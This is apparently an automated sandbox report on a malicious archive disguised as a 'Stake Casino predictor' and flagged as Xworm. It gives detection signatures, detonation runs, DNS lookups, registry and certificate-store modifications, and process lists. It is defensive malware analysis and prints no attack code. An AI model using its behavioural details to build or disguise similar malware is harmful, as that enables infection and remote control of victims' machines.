Analysis Overview
SHA256
cdde0a99b6eb34272e471e7d68c7e201892d06f4bcec7254c1a60e89daf3a22c
Threat Level: Known bad
The file Stake-Casino-predictorV5.3.zip was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Checks computer location settings
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Modifies system certificate store
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of UnmapMainImage
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-27 22:31
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win10-20240404-en
Max time kernel
134s
Max time network
136s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.16.208.104.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win10v2004-20240426-en
Max time kernel
94s
Max time network
96s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win11-20240426-en
Max time kernel
93s
Max time network
94s
Command Line
Signatures
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\driver.vbs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win10-20240404-en
Max time kernel
77s
Max time network
86s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\render.exe
"C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Data\render.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/2908-0-0x0000018A9AAE0000-0x0000018A9AAF0000-memory.dmp
memory/2908-1-0x00007FFA016F3000-0x00007FFA016F4000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 22:31
Reported
2024-05-27 22:34
Platform
win10-20240404-en
Max time kernel
150s
Max time network
141s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\render.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-27-22-32-24.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\SleepStudy\user-not-present-trace-2024-05-27-22-32-24.etl | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | c:\windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | c:\windows\system32\svchost.exe | N/A |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 0f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b5300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100200052003200000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 190000000100000010000000683f58e5528121a89cf21532e700535f030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e6200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c09000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410020005200320000005300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 0f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9 | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 190000000100000010000000787d09f953c59978ecd8d6e44b38e24f030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb1d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a140000000100000014000000dd040907a2f57a7d5253129295ee3880250da65962000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b6909000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410000000f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e722000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9 | C:\Users\Admin\AppData\Local\Temp\Stake-Casino-predictorV5.3\Stake-Casino-predictor.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
c:\windows\system32\svchost.exe
